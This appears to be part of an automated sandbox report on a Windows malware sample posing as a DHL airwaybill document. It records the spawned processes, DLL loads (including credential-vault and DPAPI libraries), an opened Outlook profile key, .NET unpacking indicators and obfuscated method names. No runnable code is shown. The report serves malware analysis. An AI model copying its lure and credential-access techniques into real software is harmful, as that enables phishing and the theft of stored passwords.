            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeProcess created: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe "C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exe"Jump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ZYkF.pdbSHA256 source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: ZYkF.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe
            Source: Binary string: mshta.pdbGCTL source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: toceDGfrPzLv.exe, 00000005.00000002.4604412085.0000000000FFE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2383445060.0000000002CB3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.2381315371.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshta.pdb source: DHL airwaybill # 6913321715 & BL Draft copy.exe, 00000003.00000002.2381317520.0000000001508000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exe, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.2806948.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.cs.Net Code: QoXvRilF6i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.69f0000.5.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, emu8FuFpCfwR9JjoYE.cs.Net Code: QoXvRilF6i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.285c558.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3a36728.3.raw.unpack, emu8FuFpCfwR9JjoYE.cs.Net Code: QoXvRilF6i System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.28cfa10.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 5.2.toceDGfrPzLv.exe.3aecd14.1.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 6.2.mshta.exe.353cd14.2.raw.unpack, MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_0279A158 pushfd ; ret 0_2_0279A165
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_04D5ED4A push ecx; retf 0_2_04D5ED4B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 0_2_04D531F9 push dword ptr [ecx+edx-75h]; iretd 0_2_04D531CF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_00401866 push cs; retf 3_2_0040186F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004148B5 push es; iretd 3_2_004148B7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_00414147 push esp; iretd 3_2_0041414A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0041631C push edi; retf 3_2_00416340
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_00417BE1 push esi; retf 002Fh3_2_00417BE2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004033F0 push eax; ret 3_2_004033F2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0041044C push es; ret 3_2_00410451
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_00407438 push esp; iretd 3_2_0040743F
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_0041548D push ecx; iretd 3_2_00415497
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_004174A7 push cs; iretd 3_2_004174AA
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD225F pushad ; ret 3_2_01AD27F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD27FA pushad ; ret 3_2_01AD27F9
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B009AD push ecx; mov dword ptr [esp], ecx3_2_01B009B6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD283D push eax; iretd 3_2_01AD2858
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AD1368 push eax; iretd 3_2_01AD1369
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03441E07 push es; iretd 5_2_03441E09
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03441699 push esp; iretd 5_2_0344169C
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_03445133 push esi; retf 002Fh5_2_03445134
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_034429DF push ecx; iretd 5_2_034429E9
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_034449F9 push cs; iretd 5_2_034449FC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343498A push esp; iretd 5_2_03434991
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0343D99E push es; ret 5_2_0343D9A3
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_0344386E push edi; retf 5_2_03443892
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F8DCF4 push esp; iretd 5_2_05F8DCF7
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F8E462 push es; iretd 5_2_05F8E464
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F89FF9 push es; ret 5_2_05F89FFE
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F80FE5 push esp; iretd 5_2_05F80FEC
            Source: C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exeCode function: 5_2_05F9178E push esi; retf 002Fh5_2_05F9178F
            Source: DHL airwaybill # 6913321715 & BL Draft copy.exeStatic PE information: section name: .text entropy: 7.771292073435149
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, GMtSvpf5AilnKv2aga.csHigh entropy of concatenated method names: 'bYkHiQSiaB', 'GQlHAQBhNb', 'ToString', 'GX4H2wC31W', 'K3YHNBEJwx', 'kKdHOHDsqH', 'woqHkuTtgb', 'UelHZjqJlL', 'I0sHm2ig7W', 'DeYHFqwrk0'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, U6wYXWKKSn3IGRNEuEG.csHigh entropy of concatenated method names: 'ToString', 'XewVwytVWT', 'RgtVvlP9cR', 'QRoVaFZ5pa', 'DrYV2C5et0', 'AmIVNgOEPB', 'zL2VOCKZc0', 'L8LVkyZnp0', 'PxQqT3aXPlIyhMNcmXj', 'fs2BWFaUE8hOMGp2EYd'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, dTPmcsMsBVnAjs1cVT.csHigh entropy of concatenated method names: 'CJ6m2BgOLf', 'zHxmOkooLR', 'AlwmZnKREB', 'DlEZUaoZLM', 'uymZzvJCpt', 'GrrmLQfQvF', 'QEdmKfSikJ', 'zW6m5xBUfL', 'R8pmwvpbAD', 'r58mvQnP4B'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, qsjP1hKLoqD9W8AXKl9.csHigh entropy of concatenated method names: 'xS6pGICvvp', 'V6wpjcVyj0', 'TSApRUghmu', 'QDipDIMTaa', 'GVKpIguPUV', 'OvYpBbrlma', 'N3ipc25LVr', 'fbapQiDMoW', 'HRhpE8xKUS', 'qstpyT71xg'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, x2ZQByCxqQjPXU7r8F.csHigh entropy of concatenated method names: 'ToString', 'PPPb6S3KoS', 'snZbnCIrCw', 'Yyhb0XZieT', 'U0bbhmeG6R', 'wtWb3VVYD0', 'm4lbqIElSn', 'oFqbMs7bGC', 'vt0bSpytX2', 'NoKb7CBs9T'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, koZhoAlf7dm2EFDV3o.csHigh entropy of concatenated method names: 'ckt4sG0Zeb', 'PCm4P6xAL7', 's1v4lacb7k', 'Dac4J3R9Jb', 'jVe4nUfKVT', 'zen40e7Osw', 'GAB4hcqpyC', 'X6v43GAde3', 'i2T4q5lvS4', 'hUi4MXIVIm'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, ReGbvE9Wxkq2eCxiMb.csHigh entropy of concatenated method names: 'xQ8rQXmtAn', 'Tl0rENTIY6', 'N03r8RsGQZ', 'tQgrnvkqUl', 'BwVrhTSOXL', 'wvqr3skOK2', 'Fl2rMmb0FN', 'PPIrStL5xW', 'AwxrsHZXGs', 'gFsr66Jd94'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, Iq65bYtJ41XLOQSQ2p.csHigh entropy of concatenated method names: 'sx2o8E2yP3', 'VU1onMn0C8', 'EOco0r2X8L', 'GuaohFR8XW', 'rePoly7mXq', 'jEOo3itsP8', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, PFITS5g6su8FVYo35e.csHigh entropy of concatenated method names: 'e1Go2CeNgp', 'gRVoNr3grk', 'xPdoObOqSC', 'xDdokvUpjQ', 'WnLoZikds5', 'NZGom0JIar', 'Y9HoFvFoYw', 'jEeoeuB9fX', 'yDQoi70QvI', 'aufoAgA0eg'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, zDJiq47v4bi85xO4vA.csHigh entropy of concatenated method names: 'cfxmGWkxW9', 'kfRmj28jVQ', 'r4xmRMZln7', 'uNbmDmseFU', 'RH2mIUuQV0', 'mgumBk6iTb', 'fskmctKGwQ', 'JSnmQHqgbO', 'XtRmEZHYCH', 'WNGmyAg6W1'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, xGjOf7zhvY9TFGu5fD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zIbpryFZa7', 'Sjjp40qitX', 'HeXpbqRPDc', 'YQYpHFaR8J', 'fv5po1aAHr', 'M2Zpp7H9iV', 'AsEpVinaiK'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, GhhoIpKw5Ftcr3MW8iJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DNLVlDDOCK', 'DFpVJdgiFa', 'mCmVCvFFXB', 'eDRVfNJVL4', 'dq3VWlHs0Y', 'mnFVXWQFSm', 'ryBVd06uYi'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, PddjRfvi1pWokwcaVJ.csHigh entropy of concatenated method names: 'aRpKm8uyoo', 'JZFKFuJisH', 'TKfKiZeGNQ', 'EUgKAnyeXI', 'uTyK4FYkA6', 'BGvKbM59C3', 'U0DueZWulMITJRpIPE', 'ggqd7BZbVGuKpXaJyW', 'rc5KKjc0A1', 'xIQKwW5vkP'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, iA6IGv8M59C3EZ3nTA.csHigh entropy of concatenated method names: 'pUXZa4onQD', 'awyZN8xuTM', 'plcZkyeiRi', 'qNNZmYMjny', 'f0MZFC6BS9', 'oepkWl80nC', 'pcIkX5KYQO', 'j3rkdNEM21', 'PlXkg4dFFM', 'DtyktPdhss'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, FeXIsLyJ1eZiNuTyFY.csHigh entropy of concatenated method names: 'hoHkIgTWj5', 'TeXkcRlKl0', 'ziWO0aX7nB', 'StFOhKtqqV', 'ml1O3Ndj4Y', 'W6tOqNs3cI', 'l2EOMx1Ssm', 'dbMOSvD2i3', 'JHCO7Y3Te2', 'oXyOscGZyX'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, s8uyooQ3ZFuJisHEdm.csHigh entropy of concatenated method names: 'agxNlfKmoV', 'HyQNJ6fBdd', 'vQONCFpNNl', 'hvBNfQxZ2G', 'eifNWeEvew', 'OV0NXsZ0Lb', 'JdMNdCaFkg', 'OGFNgjqRIG', 'RaONtnEoO8', 'WvcNUyomZv'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, coCjNfEKfZeGNQEUgn.csHigh entropy of concatenated method names: 'onCODN5FeM', 'HkROBwUcqV', 'IIXOQobVHM', 'm9LOEnBnkX', 'U0OO4vAIhA', 'XlmObSJq5c', 'jMwOHtKbcH', 'dkDOoOT1ts', 'JtEOpkGBEA', 'Vi0OVVSeR1'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, v8DN9pNuUqReIRa3sc.csHigh entropy of concatenated method names: 'Dispose', 'w42KtwnkXB', 'Q3V5n3baFs', 'cnskkLeBWR', 'iPFKUITS56', 'Nu8KzFVYo3', 'ProcessDialogKey', 'ceh5Lq65bY', 'R415KXLOQS', 'D2p55J5cUK'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, O5e07N5AsjTjYA0fbh.csHigh entropy of concatenated method names: 'qqUR0T1sy', 'Y3UDKWUuv', 'XbPBngBfR', 'yt1coJJTI', 'XpxEIN71Q', 'qWty1S9AU', 'uBwVIlUABn8gTxS7T0', 'chjR0cK7hDUlxOsH22', 'mBroKSxXR', 'qAfVm7mN4'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, emu8FuFpCfwR9JjoYE.csHigh entropy of concatenated method names: 'rRVwaOWCKD', 'jVow2jCpY6', 'ePWwNyYACU', 'q2xwOp0Vsq', 'yljwkHyrEx', 'iVywZsjMeH', 'ii9wmAf3h6', 'hjVwFA5slT', 'LInweruvQL', 'TI1wiN4YOC'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, R5cUKiU6aNgguvgt3B.csHigh entropy of concatenated method names: 'r30pKqBBjI', 'm5Apwovu1b', 'dGQpvKrHLK', 'cl3p2lZEJ6', 'xRNpNxXy3C', 'TkNpkr0wyf', 'l0IpZbYHYq', 'JV2odUe8Sr', 'yUyogBXl6b', 'PnlotIRnPl'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.3abe148.4.raw.unpack, R3xhl7XDuPEX7EZrS0.csHigh entropy of concatenated method names: 'iyIHgO7SI6', 'v6kHU6mwXX', 'FSnoLWnlF7', 'nH5oKsSgTe', 'fp5H6Q4aCW', 'NCFHPWBttf', 'uAaH9Z2oII', 'x8cHlYsNsN', 'S1mHJauNbJ', 'bj3HCj13Rm'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, GMtSvpf5AilnKv2aga.csHigh entropy of concatenated method names: 'bYkHiQSiaB', 'GQlHAQBhNb', 'ToString', 'GX4H2wC31W', 'K3YHNBEJwx', 'kKdHOHDsqH', 'woqHkuTtgb', 'UelHZjqJlL', 'I0sHm2ig7W', 'DeYHFqwrk0'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, U6wYXWKKSn3IGRNEuEG.csHigh entropy of concatenated method names: 'ToString', 'XewVwytVWT', 'RgtVvlP9cR', 'QRoVaFZ5pa', 'DrYV2C5et0', 'AmIVNgOEPB', 'zL2VOCKZc0', 'L8LVkyZnp0', 'PxQqT3aXPlIyhMNcmXj', 'fs2BWFaUE8hOMGp2EYd'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, dTPmcsMsBVnAjs1cVT.csHigh entropy of concatenated method names: 'CJ6m2BgOLf', 'zHxmOkooLR', 'AlwmZnKREB', 'DlEZUaoZLM', 'uymZzvJCpt', 'GrrmLQfQvF', 'QEdmKfSikJ', 'zW6m5xBUfL', 'R8pmwvpbAD', 'r58mvQnP4B'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, qsjP1hKLoqD9W8AXKl9.csHigh entropy of concatenated method names: 'xS6pGICvvp', 'V6wpjcVyj0', 'TSApRUghmu', 'QDipDIMTaa', 'GVKpIguPUV', 'OvYpBbrlma', 'N3ipc25LVr', 'fbapQiDMoW', 'HRhpE8xKUS', 'qstpyT71xg'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, x2ZQByCxqQjPXU7r8F.csHigh entropy of concatenated method names: 'ToString', 'PPPb6S3KoS', 'snZbnCIrCw', 'Yyhb0XZieT', 'U0bbhmeG6R', 'wtWb3VVYD0', 'm4lbqIElSn', 'oFqbMs7bGC', 'vt0bSpytX2', 'NoKb7CBs9T'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, koZhoAlf7dm2EFDV3o.csHigh entropy of concatenated method names: 'ckt4sG0Zeb', 'PCm4P6xAL7', 's1v4lacb7k', 'Dac4J3R9Jb', 'jVe4nUfKVT', 'zen40e7Osw', 'GAB4hcqpyC', 'X6v43GAde3', 'i2T4q5lvS4', 'hUi4MXIVIm'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, ReGbvE9Wxkq2eCxiMb.csHigh entropy of concatenated method names: 'xQ8rQXmtAn', 'Tl0rENTIY6', 'N03r8RsGQZ', 'tQgrnvkqUl', 'BwVrhTSOXL', 'wvqr3skOK2', 'Fl2rMmb0FN', 'PPIrStL5xW', 'AwxrsHZXGs', 'gFsr66Jd94'
            Source: 0.2.DHL airwaybill # 6913321715 & BL Draft copy.exe.8550000.6.raw.unpack, Iq65bYtJ41XLOQSQ2p.csHigh entropy of concatenated method names: 'sx2o8E2yP3', 'VU1onMn0C8', 'EOco0r2X8L', 'GuaohFR8XW', 'rePoly7mXq', 'jEOo3itsP8', 'Next', 'Next', 'Next', 'NextBytes'
